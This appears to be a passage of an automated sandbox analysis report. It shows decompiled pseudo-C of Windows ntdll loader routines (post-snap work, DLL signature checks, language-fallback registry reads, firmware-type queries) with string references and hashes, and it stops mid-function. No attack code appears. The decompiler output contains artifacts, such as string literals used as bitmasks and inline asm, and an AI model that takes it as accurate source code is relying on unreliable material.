                                                                                  											 *(_t161 + 0x64) = _t136;
                                                                                  											_t151 =  *_t157;
                                                                                  											_v20 = _t136;
                                                                                  											while(1) {
                                                                                  												__eflags =  *((intOrPtr*)(0xf95c60 + _t103 * 8)) - _t151;
                                                                                  												if( *((intOrPtr*)(0xf95c60 + _t103 * 8)) == _t151) {
                                                                                  													break;
                                                                                  												}
                                                                                  												_t103 = _t103 + 1;
                                                                                  												__eflags = _t103 - 5;
                                                                                  												if(_t103 < 5) {
                                                                                  													continue;
                                                                                  												}
                                                                                  												L21:
                                                                                  												_t105 = E00EEF380(_t136, 0xe81184, 0x10);
                                                                                  												__eflags = _t105;
                                                                                  												if(_t105 != 0) {
                                                                                  													__eflags =  *_t157 -  *_v16;
                                                                                  													if( *_t157 >=  *_v16) {
                                                                                  														goto L22;
                                                                                  													} else {
                                                                                  														asm("cdq");
                                                                                  														_t166 = _t157[5] & 0x0000ffff;
                                                                                  														_t108 = _t157[5] & 0x0000ffff;
                                                                                  														asm("cdq");
                                                                                  														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                                  														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                                  														if(__eflags > 0) {
                                                                                  															L29:
                                                                                  															E00EC2280(_t108, 0xf986cc);
                                                                                  															 *_t118 =  *_t118 + 1;
                                                                                  															_t42 = _t118 + 0x40; // 0x3f
                                                                                  															_t156 = _t42;
                                                                                  															asm("adc dword [ebx+0x4], 0x0");
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															asm("movsd");
                                                                                  															_t110 = E00ED61A0( &_v32);
                                                                                  															__eflags = _t110;
                                                                                  															if(_t110 != 0) {
                                                                                  																__eflags = _v32 | _v28;
                                                                                  																if((_v32 | _v28) != 0) {
                                                                                  																	_t134 = _v20;
                                                                                  																	L55:
                                                                                  																	E00F79D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                                  																}
                                                                                  															}
                                                                                  															L30:
                                                                                  															 *_t118 =  *_t118 + 1;
                                                                                  															asm("adc dword [ebx+0x4], 0x0");
                                                                                  															E00EBFFB0(_t118, _t156, 0xf986cc);
                                                                                  															goto L22;
                                                                                  														} else {
                                                                                  															if(__eflags < 0) {
                                                                                  																goto L22;
                                                                                  															} else {
                                                                                  																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                                  																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                                  																	goto L22;
                                                                                  																} else {
                                                                                  																	goto L29;
                                                                                  																}
                                                                                  															}
                                                                                  														}
                                                                                  													}
                                                                                  													goto L56;
                                                                                  												}
                                                                                  												goto L22;
                                                                                  											}
                                                                                  											asm("lock inc dword [eax]");
                                                                                  											goto L21;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						return _t143;
                                                                                  					}
                                                                                  				} else {
                                                                                  					_push( &_v8);
                                                                                  					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                                  					_push(__ecx + 0x40);
                                                                                  					_push(_t121);
                                                                                  					_push(0xffffffff);
                                                                                  					_t80 = E00EE9A00();
                                                                                  					_t159 = _t80;
                                                                                  					if(_t159 < 0) {
                                                                                  						L8:
                                                                                  						return _t80;
                                                                                  					} else {
                                                                                  						goto L2;
                                                                                  					}
                                                                                  				}
                                                                                  				L56:
                                                                                  			}

                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 00F09C28
                                                                                  • LdrpDoPostSnapWork, xrefs: 00F09C1E
                                                                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00F09C18
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 2994545307-1948996284
                                                                                  • Opcode ID: ca72588540b68db4f385029fa086f50b9103efec6bb7a3fecd9a288c8d123e37
                                                                                  • Instruction ID: 8159911d2271c76576645313dce7700f19b52d73da378add64775f745d66a1e9
                                                                                  • Opcode Fuzzy Hash: ca72588540b68db4f385029fa086f50b9103efec6bb7a3fecd9a288c8d123e37
                                                                                  • Instruction Fuzzy Hash: 0A91E331A0021A9BDF18DF54C981AFB73B9FF44318B94506AE949BB351EF70AD01DB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 98%
                                                                                  			E00EB7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                  				char _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				char _v24;
                                                                                  				signed int _t73;
                                                                                  				void* _t77;
                                                                                  				char* _t82;
                                                                                  				char* _t87;
                                                                                  				signed char* _t97;
                                                                                  				signed char _t102;
                                                                                  				intOrPtr _t107;
                                                                                  				signed char* _t108;
                                                                                  				intOrPtr _t112;
                                                                                  				intOrPtr _t124;
                                                                                  				intOrPtr _t125;
                                                                                  				intOrPtr _t126;
                                                                                  
                                                                                  				_t107 = __edx;
                                                                                  				_v12 = __ecx;
                                                                                  				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                  				_t124 = 0;
                                                                                  				_v20 = __edx;
                                                                                  				if(E00EBCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                                  					_t112 = _v8;
                                                                                  				} else {
                                                                                  					_t112 = 0;
                                                                                  					_v8 = 0;
                                                                                  				}
                                                                                  				if(_t112 != 0) {
                                                                                  					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                                  						_t124 = 0xc000007b;
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                                  					 *(_t125 + 0x34) = _t73;
                                                                                  					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  					 *(_t125 + 0x34) = _t73 | L"ersists, try restarting the physical computer.\r\n";
                                                                                  					_t124 = E00EAC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                                  					if(_t124 < 0) {
                                                                                  						goto L8;
                                                                                  					} else {
                                                                                  						goto L3;
                                                                                  					}
                                                                                  				} else {
                                                                                  					L3:
                                                                                  					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                                  						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                                  						L8:
                                                                                  						return _t124;
                                                                                  					}
                                                                                  					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                                  						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                                  							goto L5;
                                                                                  						}
                                                                                  						_t102 =  *0xf95780; // 0x0
                                                                                  						if((_t102 & 0x00000003) != 0) {
                                                                                  							E00F25510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                                  							_t102 =  *0xf95780; // 0x0
                                                                                  						}
                                                                                  						if((_t102 & 0x00000010) != 0) {
                                                                                  							asm("int3");
                                                                                  						}
                                                                                  						_t124 = 0xc0000428;
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					L5:
                                                                                  					if(( *(_t125 + 0x34) & L"ersists, try restarting the physical computer.\r\n") != 0) {
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					_t77 = _a4 - 0x40000003;
                                                                                  					if(_t77 == 0 || _t77 == 0x33) {
                                                                                  						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                  						if(E00EC7D50() != 0) {
                                                                                  							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                  						} else {
                                                                                  							_t82 = 0x7ffe0384;
                                                                                  						}
                                                                                  						_t108 = 0x7ffe0385;
                                                                                  						if( *_t82 != 0) {
                                                                                  							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                  								if(E00EC7D50() == 0) {
                                                                                  									_t97 = 0x7ffe0385;
                                                                                  								} else {
                                                                                  									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                  								}
                                                                                  								if(( *_t97 & 0x00000020) != 0) {
                                                                                  									E00F27016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						if(_a4 != 0x40000003) {
                                                                                  							L14:
                                                                                  							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                  							if(E00EC7D50() != 0) {
                                                                                  								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                  							} else {
                                                                                  								_t87 = 0x7ffe0384;
                                                                                  							}
                                                                                  							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                  								if(E00EC7D50() != 0) {
                                                                                  									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                  								}
                                                                                  								if(( *_t108 & 0x00000020) != 0) {
                                                                                  									E00F27016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                                  								}
                                                                                  							}
                                                                                  							goto L8;
                                                                                  						} else {
                                                                                  							_v16 = _t125 + 0x24;
                                                                                  							_t124 = E00EDA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                                  							if(_t124 < 0) {
                                                                                  								E00EAB1E1(_t124, 0x1490, 0, _v16);
                                                                                  								goto L8;
                                                                                  							}
                                                                                  							goto L14;
                                                                                  						}
                                                                                  					} else {
                                                                                  						goto L8;
                                                                                  					}
                                                                                  				}
                                                                                  			}





















                                                                                  Strings
                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 00F09891
                                                                                  • LdrpCompleteMapModule, xrefs: 00F09898
                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 00F098A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                  • API String ID: 0-1676968949
                                                                                  • Opcode ID: 41e4027c15a4be54fb898bc03e7e7b2da74957854abceaf88c7fcf501c553ec4
                                                                                  • Instruction ID: 69de6294569c423a7ff1c86dc45da8e1a5f1860c8d0b4d23fbe81c5ecfec107b
                                                                                  • Opcode Fuzzy Hash: 41e4027c15a4be54fb898bc03e7e7b2da74957854abceaf88c7fcf501c553ec4
                                                                                  • Instruction Fuzzy Hash: 75512531A087449BDB21CB68C984BAB7BE4EF85314F14159DE891BBBE2D774ED00EB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 93%
                                                                                  			E00EAE620(void* __ecx, short* __edx, short* _a4) {
                                                                                  				char _v16;
                                                                                  				char _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				char* _v28;
                                                                                  				char _v32;
                                                                                  				char _v36;
                                                                                  				char _v44;
                                                                                  				signed int _v48;
                                                                                  				intOrPtr _v52;
                                                                                  				void* _v56;
                                                                                  				void* _v60;
                                                                                  				char _v64;
                                                                                  				void* _v68;
                                                                                  				void* _v76;
                                                                                  				void* _v84;
                                                                                  				signed int _t59;
                                                                                  				signed int _t74;
                                                                                  				signed short* _t75;
                                                                                  				signed int _t76;
                                                                                  				signed short* _t78;
                                                                                  				signed int _t83;
                                                                                  				short* _t93;
                                                                                  				signed short* _t94;
                                                                                  				short* _t96;
                                                                                  				void* _t97;
                                                                                  				signed int _t99;
                                                                                  				void* _t101;
                                                                                  				void* _t102;
                                                                                  
                                                                                  				_t80 = __ecx;
                                                                                  				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                                  				_t96 = __edx;
                                                                                  				_v44 = __edx;
                                                                                  				_t78 = 0;
                                                                                  				_v56 = 0;
                                                                                  				if(__ecx == 0 || __edx == 0) {
                                                                                  					L28:
                                                                                  					_t97 = 0xc000000d;
                                                                                  				} else {
                                                                                  					_t93 = _a4;
                                                                                  					if(_t93 == 0) {
                                                                                  						goto L28;
                                                                                  					}
                                                                                  					_t78 = E00EAF358(__ecx, 0xac);
                                                                                  					if(_t78 == 0) {
                                                                                  						_t97 = 0xc0000017;
                                                                                  						L6:
                                                                                  						if(_v56 != 0) {
                                                                                  							_push(_v56);
                                                                                  							E00EE95D0();
                                                                                  						}
                                                                                  						if(_t78 != 0) {
                                                                                  							L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                                  						}
                                                                                  						return _t97;
                                                                                  					}
                                                                                  					E00EEFA60(_t78, 0, 0x158);
                                                                                  					_v48 = _v48 & 0x00000000;
                                                                                  					_t102 = _t101 + 0xc;
                                                                                  					 *_t96 = 0;
                                                                                  					 *_t93 = 0;
                                                                                  					E00EEBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                                  					_v36 = 0x18;
                                                                                  					_v28 =  &_v44;
                                                                                  					_v64 = 0;
                                                                                  					_push( &_v36);
                                                                                  					_push(0x20019);
                                                                                  					_v32 = 0;
                                                                                  					_push( &_v64);
                                                                                  					_v24 = 0x40;
                                                                                  					_v20 = 0;
                                                                                  					_v16 = 0;
                                                                                  					_t97 = E00EE9600();
                                                                                  					if(_t97 < 0) {
                                                                                  						goto L6;
                                                                                  					}
                                                                                  					E00EEBB40(0,  &_v36, L"InstallLanguageFallback");
                                                                                  					_push(0);
                                                                                  					_v48 = 4;
                                                                                  					_t97 = L00EAF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                                  					if(_t97 >= 0) {
                                                                                  						if(_v52 != 1) {
                                                                                  							L17:
                                                                                  							_t97 = 0xc0000001;
                                                                                  							goto L6;
                                                                                  						}
                                                                                  						_t59 =  *_t78 & 0x0000ffff;
                                                                                  						_t94 = _t78;
                                                                                  						_t83 = _t59;
                                                                                  						if(_t59 == 0) {
                                                                                  							L19:
                                                                                  							if(_t83 == 0) {
                                                                                  								L23:
                                                                                  								E00EEBB40(_t83, _t102 + 0x24, _t78);
                                                                                  								if(L00EB43C0( &_v48,  &_v64) == 0) {
                                                                                  									goto L17;
                                                                                  								}
                                                                                  								_t84 = _v48;
                                                                                  								 *_v48 = _v56;
                                                                                  								if( *_t94 != 0) {
                                                                                  									E00EEBB40(_t84, _t102 + 0x24, _t94);
                                                                                  									if(L00EB43C0( &_v48,  &_v64) != 0) {
                                                                                  										 *_a4 = _v56;
                                                                                  									} else {
                                                                                  										_t97 = 0xc0000001;
                                                                                  										 *_v48 = 0;
                                                                                  									}
                                                                                  								}
                                                                                  								goto L6;
                                                                                  							}
                                                                                  							_t83 = _t83 & 0x0000ffff;
                                                                                  							while(_t83 == 0x20) {
                                                                                  								_t94 =  &(_t94[1]);
                                                                                  								_t74 =  *_t94 & 0x0000ffff;
                                                                                  								_t83 = _t74;
                                                                                  								if(_t74 != 0) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								goto L23;
                                                                                  							}
                                                                                  							goto L23;
                                                                                  						} else {
                                                                                  							goto L14;
                                                                                  						}
                                                                                  						while(1) {
                                                                                  							L14:
                                                                                  							_t27 =  &(_t94[1]); // 0x2
                                                                                  							_t75 = _t27;
                                                                                  							if(_t83 == 0x2c) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t94 = _t75;
                                                                                  							_t76 =  *_t94 & 0x0000ffff;
                                                                                  							_t83 = _t76;
                                                                                  							if(_t76 != 0) {
                                                                                  								continue;
                                                                                  							}
                                                                                  							goto L23;
                                                                                  						}
                                                                                  						 *_t94 = 0;
                                                                                  						_t94 = _t75;
                                                                                  						_t83 =  *_t75 & 0x0000ffff;
                                                                                  						goto L19;
                                                                                  					}
                                                                                  				}
                                                                                  			}
































                                                                                  Strings
                                                                                  • @, xrefs: 00EAE6C0
                                                                                  • InstallLanguageFallback, xrefs: 00EAE6DB
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00EAE68C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                  • API String ID: 0-1757540487
                                                                                  • Opcode ID: ebbdef4d77010fbfdc1b47b5d49339a59c8588661a5ae6642fa3b95dd8ea4b7f
                                                                                  • Instruction ID: a173cc9e3667c19bdf12b155dfd771b1b7a5fd3917ddbbef4ab138cf4c7b1fa7
                                                                                  • Opcode Fuzzy Hash: ebbdef4d77010fbfdc1b47b5d49339a59c8588661a5ae6642fa3b95dd8ea4b7f
                                                                                  • Instruction Fuzzy Hash: 6151D3B69043459BC710DF24C450AABB3E8BF88714F04192EF985EB291F770DD44DBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 77%
                                                                                  			E00F251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				signed short* _t63;
                                                                                  				signed int _t64;
                                                                                  				signed int _t65;
                                                                                  				signed int _t67;
                                                                                  				intOrPtr _t74;
                                                                                  				intOrPtr _t84;
                                                                                  				intOrPtr _t88;
                                                                                  				intOrPtr _t94;
                                                                                  				void* _t100;
                                                                                  				void* _t103;
                                                                                  				intOrPtr _t105;
                                                                                  				signed int _t106;
                                                                                  				short* _t108;
                                                                                  				signed int _t110;
                                                                                  				signed int _t113;
                                                                                  				signed int* _t115;
                                                                                  				signed short* _t117;
                                                                                  				void* _t118;
                                                                                  				void* _t119;
                                                                                  
                                                                                  				_push(0x80);
                                                                                  				_push(0xf805f0);
                                                                                  				E00EFD0E8(__ebx, __edi, __esi);
                                                                                  				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                                  				_t115 =  *(_t118 + 0xc);
                                                                                  				 *(_t118 - 0x7c) = _t115;
                                                                                  				 *((char*)(_t118 - 0x65)) = 0;
                                                                                  				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                  				_t113 = 0;
                                                                                  				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                                  				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                                  				_t100 = __ecx;
                                                                                  				if(_t100 == 0) {
                                                                                  					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                  					E00EBEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                  					 *((char*)(_t118 - 0x65)) = 1;
                                                                                  					_t63 =  *(_t118 - 0x90);
                                                                                  					_t101 = _t63[2];
                                                                                  					_t64 =  *_t63 & 0x0000ffff;
                                                                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                  					L20:
                                                                                  					_t65 = _t64 >> 1;
                                                                                  					L21:
                                                                                  					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                                  					if(_t108 == 0) {
                                                                                  						L27:
                                                                                  						 *_t115 = _t65 + 1;
                                                                                  						_t67 = 0xc0000023;
                                                                                  						L28:
                                                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                                  						L29:
                                                                                  						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                                  						E00F253CA(0);
                                                                                  						return E00EFD130(0, _t113, _t115);
                                                                                  					}
                                                                                  					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                                  						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                                  							 *_t108 = 0;
                                                                                  						}
                                                                                  						goto L27;
                                                                                  					}
                                                                                  					 *_t115 = _t65;
                                                                                  					_t115 = _t65 + _t65;
                                                                                  					E00EEF3E0(_t108, _t101, _t115);
                                                                                  					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                                  					_t67 = 0;
                                                                                  					goto L28;
                                                                                  				}
                                                                                  				_t103 = _t100 - 1;
                                                                                  				if(_t103 == 0) {
                                                                                  					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                                  					_t74 = E00EC3690(1, _t117, 0xe81810, _t118 - 0x74);
                                                                                  					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                                  					_t101 = _t117[2];
                                                                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                  					if(_t74 < 0) {
                                                                                  						_t64 =  *_t117 & 0x0000ffff;
                                                                                  						_t115 =  *(_t118 - 0x7c);
                                                                                  						goto L20;
                                                                                  					}
                                                                                  					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                                  					_t115 =  *(_t118 - 0x7c);
                                                                                  					goto L21;
                                                                                  				}
                                                                                  				if(_t103 == 1) {
                                                                                  					_t105 = 4;
                                                                                  					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                                  					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                                  					_push(_t118 - 0x70);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push(_t105);
                                                                                  					_push(_t118 - 0x78);
                                                                                  					_push(0x6b);
                                                                                  					 *((intOrPtr*)(_t118 - 0x64)) = E00EEAA90();
                                                                                  					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                  					_t113 = L00EC4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                                  					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                                  					if(_t113 != 0) {
                                                                                  						_push(_t118 - 0x70);
                                                                                  						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                                  						_push(_t113);
                                                                                  						_push(4);
                                                                                  						_push(_t118 - 0x78);
                                                                                  						_push(0x6b);
                                                                                  						_t84 = E00EEAA90();
                                                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                                  						if(_t84 < 0) {
                                                                                  							goto L29;
                                                                                  						}
                                                                                  						_t110 = 0;
                                                                                  						_t106 = 0;
                                                                                  						while(1) {
                                                                                  							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                                  							 *(_t118 - 0x88) = _t106;
                                                                                  							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                                  							_t106 = _t106 + 1;
                                                                                  						}
                                                                                  						_t88 = E00F2500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                                  						_t119 = _t119 + 0x1c;
                                                                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                                  						if(_t88 < 0) {
                                                                                  							goto L29;
                                                                                  						}
                                                                                  						_t101 = _t118 - 0x3c;
                                                                                  						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                                  						goto L21;
                                                                                  					}
                                                                                  					_t67 = 0xc0000017;
                                                                                  					goto L28;
                                                                                  				}
                                                                                  				_push(0);
                                                                                  				_push(0x20);
                                                                                  				_push(_t118 - 0x60);
                                                                                  				_push(0x5a);
                                                                                  				_t94 = E00EE9860();
                                                                                  				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                                  				if(_t94 < 0) {
                                                                                  					goto L29;
                                                                                  				}
                                                                                  				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                                  					_t101 = L"Legacy";
                                                                                  					_push(6);
                                                                                  				} else {
                                                                                  					_t101 = L"UEFI";
                                                                                  					_push(4);
                                                                                  				}
                                                                                  				_pop(_t65);
                                                                                  				goto L21;
                                                                                  			}























                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  • Opcode ID: 96694cc374d6edb7779e10c405dc117370d681903f84ad46ecfd970351169030
                                                                                  • Instruction ID: 8b38b23cd8aa7a3b82332c77b9b40a3e20ed343fb25c6f05c7d36d3a29ca6730
                                                                                  • Opcode Fuzzy Hash: 96694cc374d6edb7779e10c405dc117370d681903f84ad46ecfd970351169030
                                                                                  • Instruction Fuzzy Hash: EC517E71E00B289FDB24DFA8D941BADBBF9FB48B40F24502DE549EB291D6719D00DB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 78%
                                                                                  			E00EAB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                  				signed int _t65;
                                                                                  				signed short _t69;
                                                                                  				intOrPtr _t70;
                                                                                  				signed short _t85;
                                                                                  				void* _t86;
                                                                                  				signed short _t89;
                                                                                  				signed short _t91;
                                                                                  				intOrPtr _t92;
                                                                                  				intOrPtr _t97;
                                                                                  				intOrPtr* _t98;
                                                                                  				signed short _t99;
                                                                                  				signed short _t101;
                                                                                  				void* _t102;
                                                                                  				char* _t103;
                                                                                  				signed short _t104;
                                                                                  				intOrPtr* _t110;
                                                                                  				void* _t111;
                                                                                  				void* _t114;
                                                                                  				intOrPtr* _t115;
                                                                                  
                                                                                  				_t109 = __esi;
                                                                                  				_t108 = __edi;
                                                                                  				_t106 = __edx;
                                                                                  				_t95 = __ebx;
                                                                                  				_push(0x90);
                                                                                  				_push(0xf7f7a8);
                                                                                  				E00EFD0E8(__ebx, __edi, __esi);
                                                                                  				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                  				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                  				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                  				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                  				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                  				if(__edx == 0xffffffff) {
                                                                                  					L6:
                                                                                  					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                  					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                  					__eflags = _t65 & 0x00000002;
                                                                                  					if((_t65 & 0x00000002) != 0) {
                                                                                  						L3:
                                                                                  						L4:
                                                                                  						return E00EFD130(_t95, _t108, _t109);
                                                                                  					}
                                                                                  					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                  					_t108 = 0;
                                                                                  					_t109 = 0;
                                                                                  					_t95 = 0;
                                                                                  					__eflags = 0;
                                                                                  					while(1) {
                                                                                  						__eflags = _t95 - 0x200;
                                                                                  						if(_t95 >= 0x200) {
                                                                                  							break;
                                                                                  						}
                                                                                  						E00EED000(0x80);
                                                                                  						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                  						_t108 = _t115;
                                                                                  						_t95 = _t95 - 0xffffff80;
                                                                                  						_t17 = _t114 - 4;
                                                                                  						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                  						__eflags =  *_t17;
                                                                                  						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                  						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                  						_t102 = _t110 + 1;
                                                                                  						do {
                                                                                  							_t85 =  *_t110;
                                                                                  							_t110 = _t110 + 1;
                                                                                  							__eflags = _t85;
                                                                                  						} while (_t85 != 0);
                                                                                  						_t111 = _t110 - _t102;
                                                                                  						_t21 = _t95 - 1; // -129
                                                                                  						_t86 = _t21;
                                                                                  						__eflags = _t111 - _t86;
                                                                                  						if(_t111 > _t86) {
                                                                                  							_t111 = _t86;
                                                                                  						}
                                                                                  						E00EEF3E0(_t108, _t106, _t111);
                                                                                  						_t115 = _t115 + 0xc;
                                                                                  						_t103 = _t111 + _t108;
                                                                                  						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                  						_t89 = _t95 - _t111;
                                                                                  						__eflags = _t89;
                                                                                  						_push(0);
                                                                                  						if(_t89 == 0) {
                                                                                  							L15:
                                                                                  							_t109 = 0xc000000d;
                                                                                  							goto L16;
                                                                                  						} else {
                                                                                  							__eflags = _t89 - 0x7fffffff;
                                                                                  							if(_t89 <= 0x7fffffff) {
                                                                                  								L16:
                                                                                  								 *(_t114 - 0x94) = _t109;
                                                                                  								__eflags = _t109;
                                                                                  								if(_t109 < 0) {
                                                                                  									__eflags = _t89;
                                                                                  									if(_t89 != 0) {
                                                                                  										 *_t103 = 0;
                                                                                  									}
                                                                                  									L26:
                                                                                  									 *(_t114 - 0xa0) = _t109;
                                                                                  									 *(_t114 - 4) = 0xfffffffe;
